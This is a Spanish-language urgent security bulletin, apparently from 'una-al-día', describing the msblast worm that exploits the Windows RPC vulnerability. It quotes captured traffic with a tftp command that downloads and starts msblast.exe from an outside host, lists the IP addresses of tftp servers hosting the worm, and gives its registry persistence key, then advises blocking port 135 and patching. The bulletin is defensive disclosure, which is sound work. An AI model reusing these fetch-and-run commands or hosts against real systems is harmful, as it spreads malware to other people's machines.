Hemos empezado a recibir informes de un nuevo gusano que se está
empezando a propagar. Utiliza la reciente vulnerabilidad descubierta en
el mecanismo RPC de todas las versiones de Windows. En el momento de
redactar este boletín de urgencia todavía no se conoce en detalle el
funcionamiento del gusano, ya que todavía está siendo analizado. Uno de
los efectos de este gusano es que provoca al reinicio del ordenador
infectado cada pocos minutos. A pesar de no disponer de muchos datos
acerca del mismo, hemos decidido publicar este boletín para advertir a
todos los lectores de ‘una-al-día’ sobre su existencia así como indicar
las medidas necesarias a tomar para evitar su propagación.

El gusano realiza un barrido de las direcciones IP con el objeto de
identificar los sistemas Windows vulnerables (sistemas con el puerto
135/tcp accesible). Cuando detecta la existencia de un sistema
vulnerable, utiliza la vulnerabilidad RPC para abrir una sesión del
intérprete de órdenes accesible de forma remota a través del puerto
4444/tcp.

Dentro de esta sesión, procede a descargar mediante tftp el código
binario de gusano. Este es el tráfico capturado de una máquina
infectada:

————-tráfico 4444/tcp———-
tftp -i aaa.bbb.ccc.ddd GET msblast.exe
start msblast.exe
msblast.exe
HTTP/1.0 403 Forbidden
Server: AdSubtract 2.50
Content-Type: text/html;charset=utf-8
Content-Length: 349

Forbidden

Forbidden

Requests from host hostname.of.attacking.host/aaa.bbb.ccc.ddd not
allowed; only requests from localhost (127.0.0.1) are allowed.

————-tráfico 4444/tcp———-

mblast.exe es un archivo ejecutable de Windows, comprimido y que ocupa 6
KB. Su hash MD5 es

MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)

La descarga del mismo puede realizarse contra uno de estos servidores
tftp:

204.210.57.87
217.211.179.193
24.147.64.171
24.147.64.205
24.147.64.208
24.147.65.146
24.147.65.45
24.147.65.9
61.254.65.159
67.119.36.219
68.112.65.38
68.166.102.136
68.166.107.21
68.166.111.175
68.166.120.34
68.166.121.135
68.166.123.4
68.166.124.186
68.166.124.93
68.166.139.155
68.166.139.210
68.166.141.66
68.166.142.194
68.166.142.215
68.166.36.178
68.166.56.123
68.166.60.51
68.166.98.3

El gusano crea una entrada en el registro de Windows para ejecutarse
automáticamente cada vez que se arranca el sistema:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

“windows auto update”=”msblast.exe”

Más vale prevenir que curar

Para evitar la entrada del gusano, es importante verificar estos dos
aspectos clave:

1. Impedir las conexiones al puerto 135/tcp procedente de redes
inseguras, como puede ser Internet.
2. Verificar que se ha aplicado la actualización publicada por Microsoft
para eliminar la vulnerabilidad RPC. Esta actualización está disponible
a través del servicio Windows Update o bien descargando la actualización
específica (ver el “una-al-día” del pasado 18 de julio para las URL de
la actualización para cada versión de Windows).

Eliminación del virus

Los diferentes fabricantes de productos antivirus están en estos
momentos analizando el gusano y es de esperar que en pocos minutos
dispongan de actualizaciones que permitan eliminarlo. Aconsejamos a
todos los lectores de ‘una-al-día’ que procedan a realizar una
actualización del archivo de firmas de su programa antivirus y, a
continuación, una verificación integral de su ordenador.